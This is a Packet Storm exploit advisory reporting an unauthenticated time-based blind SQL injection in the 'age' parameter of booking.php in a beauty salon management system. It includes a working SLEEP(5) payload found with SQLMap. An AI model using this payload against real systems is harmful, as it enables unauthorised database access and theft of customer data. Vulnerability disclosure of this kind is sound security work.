Beauty Parlour And SPA Saloon Management System SQL Injection

2016-07-12T00:00:00
ID PACKETSTORM:137871
Type packetstorm
Reporter Yakir Wizman
Modified 2016-07-12T00:00:00

Description

                                        
                                            `####  
# Vulnerability Title : Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability   
# Date : 11/07/2016  
# Exploit Author : Yakir Wizman  
# Vendor Homepage : http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system  
# Version : All Versions  
# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30  
####  
# Software Link : N/A  
# Google Dork : N/A  
# CVE : N/A  
####  
  
# Vendor Software Description:  
# Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you’ve worked hard to instill in your salon.  
# Our salon management system was created to effectively match the needs of health and beauty business owners nationwide.  
# When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system.  
####  
  
# No authentication (login) is required to exploit this vulnerability.  
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)  
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
# URL example : http://server/booking.php  
#  
# Page : booking.php  
# Parameter : age (POST)  
# Type : AND/OR time-based blind  
# Title : MySQL >= 5.0.12 AND time-based blind  
# Payload : name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test  
#   
####  
  
  
`